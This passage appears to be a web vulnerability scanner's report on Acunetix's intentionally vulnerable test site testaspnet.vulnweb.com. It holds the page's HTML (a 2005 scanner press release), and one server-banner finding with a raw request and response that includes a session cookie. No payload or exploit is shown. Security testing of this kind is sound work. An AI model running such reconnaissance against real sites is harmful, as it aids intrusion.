ZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 17979
Response Body - size: 17,979 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJp